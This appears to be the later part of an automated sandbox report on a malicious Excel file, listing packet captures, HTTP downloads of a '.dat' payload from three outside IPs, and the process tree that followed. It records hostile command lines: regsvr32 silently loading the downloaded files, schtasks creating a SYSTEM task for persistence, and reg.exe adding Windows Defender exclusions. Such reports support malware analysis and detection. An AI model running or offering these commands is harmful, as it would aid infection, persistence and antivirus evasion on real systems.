          Sep 24, 2021 16:28:12.048213959 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.048223019 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.048235893 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.048239946 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.048249960 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.048264027 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.048274040 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.048299074 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.065785885 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.237802982 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.237833023 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.237852097 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.237868071 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.237884045 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.237900019 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.237915039 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.237931967 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.237947941 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.237967014 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.237983942 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.237999916 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.238014936 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.238030910 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.238045931 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.238059044 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.238117933 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.238147020 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.239797115 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.254482985 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.254513025 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.254529953 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.254544020 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.254637003 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426192045 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426232100 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426253080 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426269054 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426292896 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426312923 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426332951 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426352978 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426373005 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426381111 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426398993 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426405907 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426409960 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426419020 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426439047 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426440954 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426455021 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426470995 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426474094 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426495075 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426506042 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426516056 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426528931 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426534891 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426542997 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426554918 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426572084 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426577091 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426584959 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426599979 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426609993 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426621914 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426636934 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426640034 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.426651001 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.426672935 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.428459883 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.461618900 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.461675882 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.461709023 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.461745024 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.461776972 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.461806059 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.461811066 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.461833000 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.461833000 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.461838961 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.461843967 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.461862087 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.461864948 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.461893082 CEST  80           49165      190.14.37.173  192.168.2.22
          Sep 24, 2021 16:28:12.461904049 CEST  49165        80         192.168.2.22   190.14.37.173
          Sep 24, 2021 16:28:12.461921930 CEST  80           49165      190.14.37.173  192.168.2.22

          UDP Packets

          Timestamp                             Source Port  Dest Port  Source IP      Dest IP
          Sep 24, 2021 16:32:48.826920033 CEST  52167        53         192.168.2.22   8.8.8.8
          Sep 24, 2021 16:32:48.846508980 CEST  53           52167      8.8.8.8        192.168.2.22
          Sep 24, 2021 16:32:48.855469942 CEST  50591        53         192.168.2.22   8.8.8.8
          Sep 24, 2021 16:32:48.874485016 CEST  53           50591      8.8.8.8        192.168.2.22

          HTTP Request Dependency Graph

          • 190.14.37.173
          • 111.90.148.104
          • 51.89.115.111

          HTTP Packets

          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
          0           192.168.2.22  49165        190.14.37.173   80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          Timestamp                             kBytes transferred  Direction  Data
          Sep 24, 2021 16:28:11.030591965 CEST  0                   OUT        GET /44463.6863100694.dat HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: 190.14.37.173
          Connection: Keep-Alive
          Sep 24, 2021 16:28:12.048015118 CEST  1                   IN         HTTP/1.1 200 OK
          Server: nginx
          Date: Fri, 24 Sep 2021 14:28:11 GMT
          Content-Type: application/octet-stream
          Content-Length: 495616
          Connection: keep-alive
          X-Powered-By: PHP/5.4.16
          Accept-Ranges: bytes
          Expires: 0
          Cache-Control: no-cache, no-store, must-revalidate
          Content-Disposition: attachment; filename="44463.6863100694.dat"


          Session ID:1
          Source IP:192.168.2.22
          Source Port:49166
          Destination IP:111.90.148.104
          Destination Port:80
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

          Timestamp:Sep 24, 2021 16:28:15.008909941 CEST
          kBytes transferred:521
          Direction:OUT
          Data:GET /44463.6863100694.dat HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: 111.90.148.104
          Connection: Keep-Alive
          Timestamp:Sep 24, 2021 16:28:20.882747889 CEST
          kBytes transferred:523
          Direction:IN
          Data:HTTP/1.1 200 OK
          Server: nginx
          Date: Fri, 24 Sep 2021 14:28:21 GMT
          Content-Type: application/octet-stream
          Content-Length: 495616
          Connection: keep-alive
          X-Powered-By: PHP/5.4.16
          Accept-Ranges: bytes
          Expires: 0
          Cache-Control: no-cache, no-store, must-revalidate
          Content-Disposition: attachment; filename="44463.6863100694.dat"


          Session ID:2
          Source IP:192.168.2.22
          Source Port:49168
          Destination IP:51.89.115.111
          Destination Port:80
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

          Timestamp:Sep 24, 2021 16:33:44.110038042 CEST
          kBytes transferred:633
          Direction:OUT
          Data:GET /44463.6863100694.dat HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: 51.89.115.111
          Connection: Keep-Alive
          Timestamp:Sep 24, 2021 16:33:44.371587038 CEST
          kBytes transferred:634
          Direction:IN
          Data:HTTP/1.1 200 OK
          Server: nginx
          Date: Fri, 24 Sep 2021 14:33:44 GMT
          Content-Type: application/octet-stream
          Content-Length: 495616
          Connection: keep-alive
          X-Powered-By: PHP/5.4.16
          Accept-Ranges: bytes
          Expires: 0
          Cache-Control: no-cache, no-store, must-revalidate
          Content-Disposition: attachment; filename="44463.6863100694.dat"


          Code Manipulations

          Statistics

          Behavior

          System Behavior

          General

          Start time:16:28:13
          Start date:24/09/2021
          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Imagebase:0x13f190000
          File size:28253536 bytes
          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          General

          Start time:16:33:51
          Start date:24/09/2021
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:regsvr32 -silent ..\Fiosa.der
          Imagebase:0xff320000
          File size:19456 bytes
          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:16:33:52
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline: -silent ..\Fiosa.der
          Imagebase:0xf70000
          File size:14848 bytes
          MD5 hash:432BE6CF7311062633459EEF6B242FB5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          General

          Start time:16:34:17
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x870000
          File size:2972672 bytes
          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:16:34:19
          Start date:24/09/2021
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:regsvr32 -silent ..\Fiosa1.der
          Imagebase:0xff320000
          File size:19456 bytes
          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:16:34:19
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48
          Imagebase:0x450000
          File size:179712 bytes
          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:16:34:20
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline: -silent ..\Fiosa1.der
          Imagebase:0x200000
          File size:14848 bytes
          MD5 hash:432BE6CF7311062633459EEF6B242FB5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          General

          Start time:16:34:21
          Start date:24/09/2021
          Path:C:\Windows\System32\taskeng.exe
          Wow64 process (32bit):false
          Commandline:taskeng.exe {7B099BF3-11FE-497B-BFDA-BF23CFB73488} S-1-5-18:NT AUTHORITY\System:Service:
          Imagebase:0xffb30000
          File size:464384 bytes
          MD5 hash:65EA57712340C09B1B0C427B4848AE05
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:16:34:21
          Start date:24/09/2021
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
          Imagebase:0xff320000
          File size:19456 bytes
          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:16:34:22
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline: -s 'C:\Users\user\Fiosa.der'
          Imagebase:0x200000
          File size:14848 bytes
          MD5 hash:432BE6CF7311062633459EEF6B242FB5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          General

          Start time:16:34:22
          Start date:24/09/2021
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:regsvr32 -silent ..\Fiosa2.der
          Imagebase:0xff320000
          File size:19456 bytes
          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          General

          Start time:16:34:22
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline: -silent ..\Fiosa2.der
          Imagebase:0x200000
          File size:14848 bytes
          MD5 hash:432BE6CF7311062633459EEF6B242FB5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          General

          Start time:16:34:47
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x870000
          File size:2972672 bytes
          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          General

          Start time:16:34:49
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x870000
          File size:2972672 bytes
          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          General

          Start time:16:34:52
          Start date:24/09/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0'
          Imagebase:0xff810000
          File size:74752 bytes
          MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          General

          Start time:16:34:53
          Start date:24/09/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gurxzqhuuwqa' /d '0'
          Imagebase:0xffac0000
          File size:74752 bytes
          MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          General

          Start time:16:36:00
          Start date:24/09/2021
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
          Imagebase:0xfffb0000
          File size:19456 bytes
          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          General

          Start time:16:36:00
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline: -s 'C:\Users\user\Fiosa.der'
          Imagebase:0x5e0000
          File size:14848 bytes
          MD5 hash:432BE6CF7311062633459EEF6B242FB5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Disassembly

          Code Analysis
